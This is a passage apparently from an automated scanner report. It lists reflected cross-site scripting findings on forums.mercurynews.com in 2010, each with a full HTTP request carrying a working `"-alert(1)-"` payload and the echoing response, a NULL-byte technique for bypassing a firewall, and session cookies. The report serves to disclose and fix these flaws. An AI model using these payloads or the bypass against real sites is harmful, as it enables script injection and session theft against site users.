Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ipt">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/syndication%0038e10"-alert(1)-"50952c2689f/jsonXmlToHtml.js";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.77. http://forums.mercurynews.com/forums/syndication/jsonXmlToHtml.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00db1dc"-alert(1)-"884372cd347 was submitted in the REST URL parameter 3. This input was echoed as db1dc"-alert(1)-"884372cd347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/syndication/jsonXmlToHtml.js%00db1dc"-alert(1)-"884372cd347 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:09 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/syndication/jsonXmlToHtml.js%00db1dc"-alert(1)-"884372cd347";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.78. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /jrss/forum/602/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea44e"-alert(1)-"b9cbcd4d1f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / jrssea44e"-alert(1)-"b9cbcd4d1f1/forum/602/5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.camp
...[SNIP]...

3.79. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /jrss/forum/602/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861fb"-alert(1)-"f033e721dd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jrss/forum861fb"-alert(1)-"f033e721dd3/602/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:14 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ge="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / jrss/forum861fb"-alert(1)-"f033e721dd3/602/5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=g
...[SNIP]...

3.80. http://forums.mercurynews.com/jrss/forum/602/5 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /jrss/forum/602/5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcc9"-alert(1)-"c5da668924b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jrss/forum/602abcc9"-alert(1)-"c5da668924b/5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / jrss/forum/602abcc9"-alert(1)-"c5da668924b/5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.81. http://forums.mercurynews.com/poll [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ddeb"-alert(1)-"d654b8caae1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll6ddeb"-alert(1)-"d654b8caae1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:52 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll6ddeb"-alert(1)-"d654b8caae1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.82. http://forums.mercurynews.com/poll [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 617c4"-alert(1)-"5f42983c31b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll?617c4"-alert(1)-"5f42983c31b=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll?617c4"-alert(1)-"5f42983c31b=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.83. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 266bd"-alert(1)-"bf4e6a9d30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:05:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll266bd"-alert(1)-"bf4e6a9d30d/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=get
...[SNIP]...

3.84. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f844"-alert(1)-"3df5df2d371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county2f844"-alert(1)-"3df5df2d371";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.85. http://forums.mercurynews.com/poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bf3"-alert(1)-"01dc7af58ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:05:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / poll/are-medical-marijuana-clubs-a-huge-problem-in-santa-clara-county?b1bf3"-alert(1)-"01dc7af58ce=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.86. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72dff"-alert(1)-"3eb0ed22cc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndication72dff"-alert(1)-"3eb0ed22cc2/jsonXmlToHtml.js HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/business
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:43:42 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=4fddb2720eb8ae7d58407c4126fd5a38; expires=Wed, 08 Dec 2010 05:17:02 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:44:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
e="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / syndication72dff"-alert(1)-"3eb0ed22cc2/jsonXmlToHtml.js";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s
...[SNIP]...

3.87. http://forums.mercurynews.com/syndication/jsonXmlToHtml.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /syndication/jsonXmlToHtml.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61ea"-alert(1)-"f6fde09b897 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndication/jsonXmlToHtml.jse61ea"-alert(1)-"f6fde09b897 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/business
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:49:50 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=3815c27cd4b31bf68aabb6e890edd039; expires=Wed, 08 Dec 2010 05:23:10 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:50:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22134

